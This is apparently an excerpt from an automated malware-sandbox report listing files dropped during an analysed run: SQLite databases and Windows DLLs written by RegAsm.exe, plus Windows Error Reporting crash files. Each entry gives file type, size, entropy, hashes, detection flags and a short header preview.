                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):685392
                                                                                                                                                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                      • Filename: MBSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: MBSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: QEO2mJ8xHx.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: j36lCJ7IcT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: YY8EqpwVDY.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: bhhPvHM59A.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: tt1pR7pJbF.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: IvxnEUAtC3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):608080
                                                                                                                                                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                      • Filename: MBSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: MBSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: QEO2mJ8xHx.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: j36lCJ7IcT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: YY8EqpwVDY.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: bhhPvHM59A.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: tt1pR7pJbF.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: IvxnEUAtC3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):450024
                                                                                                                                                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2046288
                                                                                                                                                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):257872
                                                                                                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):80880
                                                                                                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):0.71692688198349
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:JK+CaUYv2PlmO0ooyh03jCqzuiFMZ24IO8ThB:gOT2Nm1ooyGjnzuiFMY4IO8L
                                                                                                                                                                                                                                      MD5:3D4882FCEC8DC87D6E4B833C19647C07
                                                                                                                                                                                                                                      SHA1:79F557C4F0E1605AFB972265D455A323C294710B
                                                                                                                                                                                                                                      SHA-256:A3FAC9FC206CB93CAF60CA7AFDA20BFCD3790BACCB463F53038688F04C1D94D3
                                                                                                                                                                                                                                      SHA-512:EF67AD4334C9D3C388E0C6F9305EA7FB38E3E249BB3DDF8AA569CED44C111035036A1BCFED59516175F4E84DA23E6D43268F55C414C5FC22DF830B5035DC1ED0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.7.5.0.3.4.0.4.6.2.8.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.7.5.0.3.4.4.6.8.1.7.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.5.b.f.a.1.b.-.6.8.9.e.-.4.7.c.3.-.9.a.3.3.-.2.2.3.5.e.a.8.7.1.1.8.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.7.c.2.a.d.9.-.0.c.2.4.-.4.e.7.d.-.9.4.b.7.-.6.8.1.8.e.6.1.c.6.0.3.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.f.c.-.0.0.0.1.-.0.0.1.5.-.7.8.8.6.-.7.8.9.2.b.6.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.9.b.0.9.c.d.c.2.8.0.6.0.1.e.6.3.5.7.9.a.e.2.c.b.6.4.d.8.6.3.a.0.4.1.9.d.9.7.1.c.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.4.
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Tue Apr 23 19:43:54 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):35314
                                                                                                                                                                                                                                      Entropy (8bit):1.8941425937539742
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:5W8cE3t0fwwLjAhFCmv6aquGati7fK70v6B/zV6ep4xpERbiN9QIrKVkjS68LWxt:vi72DqotOSB/zBIgQjobRXn1tb
                                                                                                                                                                                                                                      MD5:04AFA747AA0F673254EC674C7D0FF408
                                                                                                                                                                                                                                      SHA1:F92B6636AFF0C844924F8234E31ECC968F6E9648
                                                                                                                                                                                                                                      SHA-256:F714327B64D86A829565E85548FB6A7FBA0A895E475C85517176B01456A35127
                                                                                                                                                                                                                                      SHA-512:C528881271C6B79624A936FDD9A0525B9A1BB89D3074408C759A7F1B68D35B86B2F0871B08722789AE06479783E4A7BDF4DD727BE3EEDCEC9148D9604423924A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MDMP..a..... .......z.(f....................................................T.......8...........T...............2{..........8...........$...............................................................................eJ..............GenuineIntel............T...........y.(f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8328
                                                                                                                                                                                                                                      Entropy (8bit):3.6956879668484777
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJtCv6Km6Y2DpSU9SR5gmfBDJl4nnpr/89bFFsfV6Xm:R6lXJA6Km6YUSU9SR5gmfVJl4nqFefVz
                                                                                                                                                                                                                                      MD5:1E40AE4AF5560E98550E66144A2EB91F
                                                                                                                                                                                                                                      SHA1:D1460D5329CA1AF47894F13C24489A738F755169
                                                                                                                                                                                                                                      SHA-256:FC878CF535E1DF763DBB319DDF2C26F7DA0722C8CA64E500CB819ABD943FDB8C
                                                                                                                                                                                                                                      SHA-512:9A02EADF07B88157405F320BA49E9F104C38B88BC2BF69F26DB64A4F8EB2524A08729466810D9D554922E4C45BD6108B2E9B08D57D519AAF2CD7E66DB790A47F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.9.2.<./.P.i.
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4605
                                                                                                                                                                                                                                      Entropy (8bit):4.483680518661762
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsiJg77aI9mGSWpW8VYOCYm8M4J1vF9+q83T0xAkUd:uIjfwI7847VhJBI0xAkUd
                                                                                                                                                                                                                                      MD5:CA4A268F499C0FCB177F623DCED1EB38
                                                                                                                                                                                                                                      SHA1:08F07C320ACA6E0B300307D9DB067D889BC3F442
                                                                                                                                                                                                                                      SHA-256:D0413C02D0F1309F5BC478B992ABB9ECE3999C97EC892869CAE97D7212B77738
                                                                                                                                                                                                                                      SHA-512:802E633431836610C6A2FAE675C53A6E13EDC8BB7F1B9A6C58069D3DEDAE8BFE05354C76C72CC9B7C8B187286AE9A2A4AB36D7EC0B075105CD199C426F365AE4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292966" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2459136
                                                                                                                                                                                                                                      Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
